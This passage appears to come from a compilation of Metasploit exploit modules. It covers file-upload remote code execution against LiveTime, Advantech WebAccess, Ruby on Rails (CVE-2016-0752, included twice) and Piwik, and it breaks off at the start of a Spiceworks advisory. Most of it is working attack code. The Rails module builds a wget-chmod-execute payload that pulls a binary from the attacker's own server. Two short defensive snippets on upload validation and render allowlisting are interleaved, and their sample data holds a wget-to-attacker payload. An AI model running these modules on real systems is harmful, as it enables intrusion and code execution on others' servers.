      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
    end

    # 5: generate the JSP with the payload
    jsp = create_jsp
    print_status("#{peer} - Uploading payload...")
    jsp_name = upload_jsp(traversal_path, jsp)
    if traversal_path.include? '/srv/tomcat6/webapps/'
      register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
    else
      register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
    end

    # 6: pwn it!
    print_status("#{peer} - Requesting #{jsp_name}")
    send_request_raw({'uri' => normalize_uri('LiveTime', jsp_name)})
    handler
  end
end
  14.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
        This vulnerability allows remote attackers to execute arbitrary code on vulnerable
        installations of Advantech WebAccess. Authentication is not required to exploit this
        vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer.
        Insufficient validation within the uploadImageCommon function in the UploadAjaxAction
        script allows unauthenticated callers to upload arbitrary code (instead of an image)
        to the server, which will then be executed under the high-privilege context of the
        IIS AppPool.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod',                         # Vulnerability discovery
          'Zhou Yu <504137480[at]qq.com>' # MSF module
        ],
      'References'     =>
        [
          [ 'CVE', '2016-0854' ],
          [ 'ZDI', '16-128' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Advantech WebAccess 8.0', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 5 2016",
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'The base path of Advantech WebAccess 8.0', '/'])
      ], self.class)
  end

  def version_match(data)
    # Software Build : 8.0-2015.08.15
    fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/)
    fingerprint['version'] unless fingerprint.nil?
  end

  def vuln_version?
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => target_uri.to_s
    )

    if res.redirect?
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(res.redirection)
      )
    end

    ver = res && res.body ? version_match(res.body) : nil
    true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
  end

  def check
    if vuln_version?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def upload_file?(filename, file)
    uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx')

    data = Rex::MIME::Message.new
    data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
    data.add_part(file, nil, nil, "form-data; name=\"file\"; filename=\"#{filename}\"")

    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => uri,
      'cookie' => "waUserName=admin",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    )

    true ? res && res.code == 200 && res.body.include?("{\"resStatus\":\"0\",\"resString\":\"\/#{filename}\"}") : false
  end

  def exec_file?(filename)
    uri = normalize_uri(target_uri)
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )

    uri = normalize_uri(target_uri, 'WADashboard', filename)
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri,
      'cookie' => res.get_cookies
    )

    true ? res && res.code == 200 : false
  end

  def exploit
    unless vuln_version?
      print_status("#{peer} - Cannot reliably check exploitability.")
      return
    end

    filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
    filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)

    print_status("#{peer} - Uploading malicious file...")
    return unless upload_file?(filename, filedata)

    print_status("#{peer} - Executing #{filename}...")
    return unless exec_file?(filename)
  end
end
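Every upload module on this page gets in through the same handful of missing server-side checks: BeeHive's `sess` value `..\\stager.jsp%00` relies on a NUL byte truncating the name, the Novell and KACE modules put `../` in the file name or a sibling parameter, NETGEAR accepts a `.jsp`, and Advantech's `uploadImageCommon` accepts `.aspx` source where an image was expected. The block below is an added example, not code from any of these modules or vendors: a single `safe_upload_path` function that applies the checks those handlers lacked. The allow-list, magic bytes and the `/srv/app/uploads` directory are assumptions chosen for the example, and the sample requests are constructed to mirror what the modules send.

```ruby
require 'securerandom'

# Added example of server-side upload validation; not code from the modules
# above or from the products they target.

class UploadRejected < StandardError; end

# Extensions the endpoint is meant to receive and the magic bytes each one
# must start with (constructed allow-list for an image upload).
IMAGE_TYPES = {
  'png'  => ["\x89PNG\r\n\x1a\n".b],
  'gif'  => ['GIF87a'.b, 'GIF89a'.b],
  'jpg'  => ["\xFF\xD8\xFF".b],
  'jpeg' => ["\xFF\xD8\xFF".b],
}.freeze

# Extensions a servlet container, IIS or PHP would execute; rejected anywhere
# in the name, so "shell.jsp.png" fails as well as "shell.jsp".
EXECUTABLE_EXTS = %w[php php3 phtml jsp jspx asp aspx cer asa exe].freeze

# Returns the server-chosen absolute path the file may be written to.
# The client's name contributes nothing except a validated extension.
def safe_upload_path(client_name, content, upload_dir, types = IMAGE_TYPES)
  name = client_name.to_s.b
  raise UploadRejected, 'empty file name' if name.empty?
  # A NUL truncates the name in C-level file APIs ("x.jsp\0.wav" opens x.jsp).
  raise UploadRejected, 'NUL byte in file name' if name.include?("\0")
  # Treat both separators as separators: the BeeHive module uses "..\\".
  parts = name.split(%r{[/\\]})
  if parts.size > 1 || name.include?('..')
    raise UploadRejected, 'path separator or traversal in file name'
  end

  exts = name.downcase.split('.').drop(1)  # every extension segment
  raise UploadRejected, 'file name has no extension' if exts.empty?
  bad = exts & EXECUTABLE_EXTS
  raise UploadRejected, "executable extension #{bad.first}" unless bad.empty?

  ext = exts.last
  magic = types[ext]
  raise UploadRejected, "extension .#{ext} not allowed" unless magic
  # The bytes must agree with the extension: a .gif holding "<%=`wget ...`%>"
  # (the Rails module's trick) or ASPX source (Advantech) fails here.
  unless magic.any? { |m| content.b.start_with?(m) }
    raise UploadRejected, 'content does not match extension'
  end

  # Never reuse the client's base name: generate one and keep only the
  # validated extension, inside a directory that serves static files only.
  File.join(File.expand_path(upload_dir), "#{SecureRandom.hex(16)}.#{ext}")
end

# Returns :accepted or the rejection reason, for a quick table.
def classify_upload(client_name, content, upload_dir = '/srv/app/uploads')
  safe_upload_path(client_name, content, upload_dir)
  :accepted
rescue UploadRejected => e
  e.message
end

# Constructed requests mirroring what the modules above send.
SAMPLES = {
  'photo.png'                                 => "\x89PNG\r\n\x1a\n".b + 'rest',
  "..\\stager.jsp\0.wav"                      => 'RIFF....WAVE',
  '../../srv/tomcat6/webapps/LiveTime/x.jsp'  => '<% %>',
  'shell.aspx'                                => '<%@ Page Language="C#" %>',
  'shell.jsp.png'                             => "\x89PNG\r\n\x1a\n".b,
  'cmd.gif'                                   => '<%=`wget http://attacker/x`%>',
}

if __FILE__ == $0
  SAMPLES.each { |n, c| puts "#{n.inspect.ljust(48)} -> #{classify_upload(n, c)}" }
end
```

Only `photo.png` is accepted, and even then it is stored under a random name the client never chose. Note the order: the NUL and separator checks run on the raw bytes before any extension logic, because `File.basename` style trimming (the Vanguard snippet at the top of this page relies on it) happens after the truncation and traversal have already been decided by the filesystem.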
  15.

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in the explicit render
        method when leveraging user parameters. This module has been tested across multiple
        versions of Ruby on Rails. The technique used by this module requires the specified
        endpoint to be using dynamic render paths, such as the following example:

        def show
          render params[:id]
        end

        Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
        can literally be any endpoint. This module doesn't use the log inclusion method of
        exploitation due to it not being universal enough. Instead, a new code injection
        technique was found and used whereby an attacker can upload temporary image files
        against any POST endpoint and use them for the inclusion attack. Finally, you only
        get one shot at this if you are testing with the builtin rails server, use caution.
      },
      'Author'         =>
        [
          'mr_me <[email protected]>',          # necromanced old bug & discovered new rce vector
          'John Poulin (forced-request)' # original render bug finder
        ],
      'References'     =>
        [
          [ 'CVE', '2016-0752'],
          [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch
          [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
          [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux', 'bsd'],
      'Arch'           => ARCH_X86,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 16 2016'))

    register_options(
      [
        Opt::RPORT(3000),
        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
      ], self.class)
  end

  def check
    # this is the check for the dev environment
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['URIPATH'], "%2f"),
      'method' => 'GET',
    }, 60)

    # if the page controller is dynamically rendering, it's for sure vuln
    if res and res.body =~ /render params/
      return CheckCode::Vulnerable
    end

    # this is the check for the prod environment
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
      'method' => 'GET',
    }, 60)

    # if we can read files, it's likely we can execute code
    if res and res.body =~ /ruby/
      return CheckCode::Appears
    end

    return CheckCode::Safe
  end

  def on_request_uri(cli, request)
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  def send_payload
    @bd = rand_text_alpha(8+rand(8))
    fn = rand_text_alpha(8+rand(8))
    un = rand_text_alpha(8+rand(8))
    pn = rand_text_alpha(8+rand(8))
    register_file_for_cleanup("/tmp/#{@bd}")
    cmd = "wget #{@service_url} -O /tmp/#{@bd};"
    cmd << "chmod 755 /tmp/#{@bd};"
    cmd << "/tmp/#{@bd}"
    pay = "<%=`#{cmd}`%>"
    print_status("uploading image...")
    data = Rex::MIME::Message.new
    data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
    res = send_request_cgi({
      'method' => 'POST',
      'cookie' => @cookie,
      'uri'    => normalize_uri(datastore['URIPATH'], pn),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    })
    if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/
      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/
      return true
    else
      # this is where we pull the log file
      if leak_log
        return true
      end
    end
    return false
  end

  def leak_log
    # path to the log /proc/self/fd/7
    # this bypasses the extension check
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
      'method' => 'GET',
    }, 60)
    if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
      return true
    end
    return false
  end

  def start_http_server
    @pl = generate_payload_exe
    @elf_sent = false
    downfile = rand_text_alpha(8+rand(8))
    resource_uri = '/' + downfile

    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
    else
      srv_host = datastore['SRVHOST']
    end

    # do not use SSL for the attacking web server
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end

    @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
    service_url_payload = srv_host + resource_uri

    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => resource_uri
    }})

    datastore['SSL'] = true if ssl_restore
    connect
  end

  def render_tmpfile
    @path.gsub!(/\//, '%2f')
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['URIPATH'], @path),
      'method' => 'GET',
    }, 1)
  end

  def exploit
    print_status("Sending initial request to detect exploitability")
    start_http_server
    if send_payload
      print_good("injected payload")
      render_tmpfile
      # we need to delay, for the stager
      select(nil, nil, nil, 5)
    end
  end
end
16. require 'msf/core'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::Remote::HttpServer
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper

      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
          'Description' => %q{
            This module exploits a remote code execution vulnerability in the explicit render
            method when leveraging user parameters. This module has been tested across multiple
            versions of Ruby on Rails. The technique used by this module requires the specified
            endpoint to be using dynamic render paths, such as the following example:

            def show
              render params[:id]
            end

            Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
            can literally be any endpoint. This module doesnt use the log inclusion method of
            exploitation due to it not being universal enough. Instead, a new code injection
            technique was found and used whereby an attacker can upload temporary image files
            against any POST endpoint and use them for the inclusion attack. Finally, you only
            get one shot at this if you are testing with the builtin rails server, use caution.
          },
          'Author' => [
            'mr_me <[email protected]>',      # necromanced old bug & discovered new vector rce vector
            'John Poulin (forced-request)'   # original render bug finder
          ],
          'References' => [
            [ 'CVE', '2016-0752'],
            [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch
            [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
            [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit
          ],
          'License'    => MSF_LICENSE,
          'Platform'   => ['linux', 'bsd'],
          'Arch'       => ARCH_X86,
          'Payload'    => { 'DisableNops' => true, },
          'Privileged' => false,
          'Targets'    => [
            [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected
          ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Oct 16 2016'))

        register_options(
          [
            Opt::RPORT(3000),
            OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
            OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
          ], self.class)
      end

      def check
        # this is the check for the dev environment
        res = send_request_cgi({
          'uri'    => normalize_uri(datastore['URIPATH'], "%2f"),
          'method' => 'GET',
        }, 60)

        # if the page controller is dynamically rendering, its for sure vuln
        if res and res.body =~ /render params/
          return CheckCode::Vulnerable
        end

        # this is the check for the prod environment
        res = send_request_cgi({
          'uri'    => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
          'method' => 'GET',
        }, 60)

        # if we can read files, its likley we can execute code
        if res and res.body =~ /ruby/
          return CheckCode::Appears
        end

        return CheckCode::Safe
      end

      def on_request_uri(cli, request)
        if (not @pl)
          print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
          return
        end
        print_status("#{rhost}:#{rport} - Sending the payload to the server...")
        @elf_sent = true
        send_response(cli, @pl)
      end

      def send_payload
        @bd = rand_text_alpha(8+rand(8))
        fn = rand_text_alpha(8+rand(8))
        un = rand_text_alpha(8+rand(8))
        pn = rand_text_alpha(8+rand(8))
        register_file_for_cleanup("/tmp/#{@bd}")
        cmd = "wget #{@service_url} -O /tmp/#{@bd};"
        cmd << "chmod 755 /tmp/#{@bd};"
        cmd << "/tmp/#{@bd}"
        pay = "<%=`#{cmd}`%>"
        print_status("uploading image...")
        data = Rex::MIME::Message.new
        data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
        res = send_request_cgi({
          'method' => 'POST',
          'cookie' => @cookie,
          'uri'    => normalize_uri(datastore['URIPATH'], pn),
          'ctype'  => "multipart/form-data; boundary=#{data.bound}",
          'data'   => data.to_s
        })
        if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/
          @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/
          return true
        else
          # this is where we pull the log file
          if leak_log
            return true
          end
        end
        return false
      end

      def leak_log
        # path to the log /proc/self/fd/7
        # this bypasses the extension check
        res = send_request_cgi({
          'uri'    => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
          'method' => 'GET',
        }, 60)
        if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
          @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
          return true
        end
        return false
      end

      def start_http_server
        @pl = generate_payload_exe
        @elf_sent = false
        downfile = rand_text_alpha(8+rand(8))
        resource_uri = '/' + downfile
        if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
          srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
        else
          srv_host = datastore['SRVHOST']
        end

        # do not use SSL for the attacking web server
        if datastore['SSL']
          ssl_restore = true
          datastore['SSL'] = false
        end

        @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
        service_url_payload = srv_host + resource_uri
        print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
        start_service({'Uri' => {
          'Proc' => Proc.new { |cli, req|
            on_request_uri(cli, req)
          },
          'Path' => resource_uri
        }})
        datastore['SSL'] = true if ssl_restore
        connect
      end

      def render_tmpfile
        @path.gsub!(/\//, '%2f')
        res = send_request_cgi({
          'uri'    => normalize_uri(datastore['URIPATH'], @path),
          'method' => 'GET',
        }, 1)
      end

      def exploit
        print_status("Sending initial request to detect exploitability")
        start_http_server
        if send_payload
          print_good("injected payload")
          render_tmpfile
          # we need to delay, for the stager
          select(nil, nil, nil, 5)
        end
      end
    end
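The module description above shows the vulnerable controller shape, `render params[:id]`, and its check probes the route with `%2f` and `%2fproc%2fself%2fcomm`. As an added example, not code from the module or from Rails, the snippet below shows the defender-side fix: a hypothetical `UsersController` resolves the requested view through an allowlist after URL-decoding, so encoded slashes, traversal and absolute paths never reach the template lookup. `ALLOWED_USER_VIEWS`, `safe_user_template` and `render_target_for` are assumed names.

```ruby
require 'cgi'

# Views the hypothetical UsersController is allowed to render dynamically.
ALLOWED_USER_VIEWS = %w[show edit profile].freeze

# Returns the template path for +requested+, or nil if it is not allowlisted.
# Decoding happens first so that "%2fproc%2fself%2fcomm" is judged on its
# decoded form ("/proc/self/comm"), which the allowlist rejects; the same
# holds for traversal ("../../etc/passwd") and Rack tempfile paths.
def safe_user_template(requested)
  return nil if requested.nil?
  name = CGI.unescape(requested.to_s)
  return nil unless ALLOWED_USER_VIEWS.include?(name)
  "users/#{name}"
end

# Vulnerable shape from the module description (shown for contrast only):
#
#   def show
#     render params[:id]
#   end
#
# Hardened shape: look the name up, otherwise fall back to a fixed view,
# so an unexpected value can only ever select one of the known templates.
def render_target_for(params)
  safe_user_template(params[:id]) || 'users/not_found'
end

# Constructed sample parameters, as a controller would receive them.
if __FILE__ == $PROGRAM_NAME
  [{ id: 'show' }, { id: '%2fproc%2fself%2fcomm' }, { id: '../../etc/passwd' }].each do |p|
    puts "#{p[:id].inspect} -> #{render_target_for(p)}"
  end
end
```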
17. ##
    # This module requires Metasploit: http://www.metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'
    require 'rex/zip'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::FileDropper
      include Msf::Exploit::Remote::HttpClient

      def initialize(info = {})
        super(update_info(
          info,
          'Name'        => 'Piwik Superuser Plugin Upload',
          'Description' => %q{
            This module will generate a plugin, pack the payload into it and upload it to a
            server running Piwik. Superuser Credentials are required to run this module.
            This module does not work against Piwik 1 as there is no option to upload custom
            plugins. Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.
          },
          'License' => MSF_LICENSE,
          'Author'  => [
            'FireFart' # Metasploit module
          ],
          'References' => [
            [ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ]
          ],
          'DisclosureDate' => 'Feb 05 2017',
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        => [['Piwik', {}]],
          'DefaultTarget'  => 0
        ))

        register_options(
          [
            OptString.new('TARGETURI', [true, 'The URI path of the Piwik installation', '/']),
            OptString.new('USERNAME', [true, 'The Piwik username to authenticate with']),
            OptString.new('PASSWORD', [true, 'The Piwik password to authenticate with'])
          ], self.class)
      end

      def username
        datastore['USERNAME']
      end

      def password
        datastore['PASSWORD']
      end

      def normalized_index
        normalize_uri(target_uri, 'index.php')
      end

      def get_piwik_version(login_cookies)
        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => normalized_index,
          'cookie'   => login_cookies,
          'vars_get' => {
            'module' => 'Feedback',
            'action' => 'index',
            'idSite' => '1',
            'period' => 'day',
            'date'   => 'yesterday'
          }
        })

        piwik_version_regexes = [
          /<title>About Piwik ([\w\.]+) -/,
          /content-title="About&#x20;Piwik&#x20;([\w\.]+)"/,
          /<h2 piwik-enriched-headline\s+feature-name="Help"\s+>About Piwik ([\w\.]+)/m
        ]

        if res && res.code == 200
          for r in piwik_version_regexes
            match = res.body.match(r)
            if match
              return match[1]
            end
          end
        end

        # check for Piwik version 1
        # the logo.svg is only available in version 1
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri, 'themes', 'default', 'images', 'logo.svg')
        })
        if res && res.code == 200 && res.body =~ /<!DOCTYPE svg/
          return "1.x"
        end

        nil
      end

      def is_superuser?(login_cookies)
        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => normalized_index,
          'cookie'   => login_cookies,
          'vars_get' => {
            'module' => 'Installation',
            'action' => 'systemCheckPage'
          }
        })
        if res && res.body =~ /You can't access this resource as it requires a 'superuser' access/
          return false
        elsif res && res.body =~ /id="systemCheckRequired"/
          return true
        else
          return false
        end
      end

      def generate_plugin(plugin_name)
        plugin_json = %Q|{
          "name": "#{plugin_name}",
          "description": "#{plugin_name}",
          "version": "#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}",
          "theme": false
        }|

        plugin_script = %Q|<?php
        namespace Piwik\\Plugins\\#{plugin_name};
        class #{plugin_name} extends \\Piwik\\Plugin {
          public function install() {
            #{payload.encoded}
          }
        }
        |

        zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
        zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
        zip.add_file("#{plugin_name}/plugin.json", plugin_json)
        zip.pack
      end

      def exploit
        print_status('Trying to detect if target is running a supported version of piwik')
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalized_index
        })
        if res && res.code == 200 && res.body =~ /<meta name="generator" content="Piwik/
          print_good('Detected Piwik installation')
        else
          fail_with(Failure::NotFound, 'The target does not appear to be running a supported version of Piwik')
        end

        print_status("Authenticating with Piwik using #{username}:#{password}...")
        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => normalized_index,
          'vars_get' => {
            'module' => 'Login',
            'action' => 'index'
          }
        })
        login_nonce = nil
        if res && res.code == 200
          match = res.body.match(/name="form_nonce" id="login_form_nonce" value="(\w+)"\/>/)
          if match
            login_nonce = match[1]
          end
        end
        fail_with(Failure::UnexpectedReply, 'Can not extract login CSRF token') if login_nonce.nil?

        cookies = res.get_cookies
        res = send_request_cgi({
          'method'    => 'POST',
          'uri'       => normalized_index,
          'cookie'    => cookies,
          'vars_get'  => {
            'module' => 'Login',
            'action' => 'index'
          },
          'vars_post' => {
            'form_login'    => "#{username}",
            'form_password' => "#{password}",
            'form_nonce'    => "#{login_nonce}"
          }
        })
        if res && res.redirect? && res.redirection
          # update cookies
          cookies = res.get_cookies
        else
          # failed login responds with code 200 and renders the login form
          fail_with(Failure::NoAccess, 'Failed to authenticate with Piwik')
        end
        print_good('Authenticated with Piwik')

        print_status("Checking if user #{username} has superuser access")
        superuser = is_superuser?(cookies)
        if superuser
          print_good("User #{username} has superuser access")
        else
          fail_with(Failure::NoAccess, "Looks like user #{username} has no superuser access")
        end

        print_status('Trying to get Piwik version')
        piwik_version = get_piwik_version(cookies)
        if piwik_version.nil?
          print_warning('Unable to detect Piwik version. Trying to continue.')
        else
          print_good("Detected Piwik version #{piwik_version}")
        end

        if piwik_version == '1.x'
          fail_with(Failure::NoTarget, 'Piwik version 1 is not supported by this module')
        end

        # Only versions after 3 have a seperate Marketplace plugin
        if piwik_version && Gem::Version.new(piwik_version) >= Gem::Version.new('3')
          marketplace_available = true
        else
          marketplace_available = false
        end

        if marketplace_available
          print_status("Checking if Marketplace plugin is active")
          res = send_request_cgi({
            'method'   => 'GET',
            'uri'      => normalized_index,
            'cookie'   => cookies,
            'vars_get' => {
              'module' => 'Marketplace',
              'action' => 'index'
            }
          })
          fail_with(Failure::UnexpectedReply, 'Can not check for Marketplace plugin') unless res

          if res.code == 200 && res.body =~ /The plugin Marketplace is not enabled/
            print_status('Marketplace plugin is not enabled, trying to enable it')
            res = send_request_cgi({
              'method'   => 'GET',
              'uri'      => normalized_index,
              'cookie'   => cookies,
              'vars_get' => {
                'module' => 'CorePluginsAdmin',
                'action' => 'plugins'
              }
            })
            mp_activate_nonce = nil
            if res && res.code == 200
              match = res.body.match(/<a href=['"]index\.php\?module=CorePluginsAdmin&action=activate&pluginName=Marketplace&nonce=(\w+).*['"]>/)
              if match
                mp_activate_nonce = match[1]
              end
            end
            fail_with(Failure::UnexpectedReply, 'Can not extract Marketplace activate CSRF token') unless mp_activate_nonce

            res = send_request_cgi({
              'method'   => 'GET',
              'uri'      => normalized_index,
              'cookie'   => cookies,
              'vars_get' => {
                'module'     => 'CorePluginsAdmin',
                'action'     => 'activate',
                'pluginName' => 'Marketplace',
                'nonce'      => "#{mp_activate_nonce}"
              }
            })
            if res && res.redirect?
              print_good('Marketplace plugin enabled')
            else
              fail_with(Failure::UnexpectedReply, 'Can not enable Marketplace plugin. Please try to manually enable it.')
            end
          else
            print_good('Seems like the Marketplace plugin is already enabled')
          end
        end

        print_status('Generating plugin')
        plugin_name = Rex::Text.rand_text_alpha(10)
        zip = generate_plugin(plugin_name)
        print_good("Plugin #{plugin_name} generated")

        print_status('Uploading plugin')
        # newer Piwik versions have a seperate Marketplace plugin
        if marketplace_available
          res = send_request_cgi({
            'method'   => 'GET',
            'uri'      => normalized_index,
            'cookie'   => cookies,
            'vars_get' => {
              'module' => 'Marketplace',
              'action' => 'overview'
            }
          })
        else
          res = send_request_cgi({
            'method'   => 'GET',
            'uri'      => normalized_index,
            'cookie'   => cookies,
            'vars_get' => {
              'module' => 'CorePluginsAdmin',
              'action' => 'marketplace'
            }
          })
        end
        upload_nonce = nil
        if res && res.code == 200
          match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m)
          if match
            upload_nonce = match[1]
          end
        end
        fail_with(Failure::UnexpectedReply, 'Can not extract upload CSRF token') if upload_nonce.nil?

        # plugin files to delete after getting our session
        register_files_for_cleanup("plugins/#{plugin_name}/plugin.json")
        register_files_for_cleanup("plugins/#{plugin_name}/#{plugin_name}.php")

        data = Rex::MIME::Message.new
        data.add_part(zip, 'application/zip', 'binary', "form-data; name=\"pluginZip\"; filename=\"#{plugin_name}.zip\"")
        res = send_request_cgi(
          'method'   => 'POST',
          'uri'      => normalized_index,
          'ctype'    => "multipart/form-data; boundary=#{data.bound}",
          'data'     => data.to_s,
          'cookie'   => cookies,
          'vars_get' => {
            'module' => 'CorePluginsAdmin',
            'action' => 'uploadPlugin',
            'nonce'  => "#{upload_nonce}"
          }
        )
        activate_nonce = nil
        if res && res.code == 200
          match = res.body.match(/<a.*href="index.php\?module=CorePluginsAdmin&action=activate.+nonce=([^&]+)/)
          if match
            activate_nonce = match[1]
          end
        end
        fail_with(Failure::UnexpectedReply, 'Can not extract activate CSRF token') if activate_nonce.nil?

        print_status('Activating plugin and triggering payload')
        send_request_cgi({
          'method'   => 'GET',
          'uri'      => normalized_index,
          'cookie'   => cookies,
          'vars_get' => {
            'module'     => 'CorePluginsAdmin',
            'action'     => 'activate',
            'nonce'      => "#{activate_nonce}",
            'pluginName' => "#{plugin_name}"
          }
        }, 5)
      end
    end
  18. Hacking

    [+] Credits: John Page AKA HYP3RLINX
    [+] Website: hyp3rlinx.altervista.org
    [+] Source: http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt
    [+] ISR: APPARITIONSEC

    Vendor:
    ==================
    www.spiceworks.com

    Product:
    =================
    Spiceworks - 7.5

    Provides network inventory and monitoring of all the devices on the network by discovering
    IP-addressable devices. It can be configured to provide custom alerts and notifications based
    on various criteria. It also provides a ticketing system, a user portal, an integrated
    knowledge base, and mobile ticket management.

    Vulnerability Type:
    ==============================================
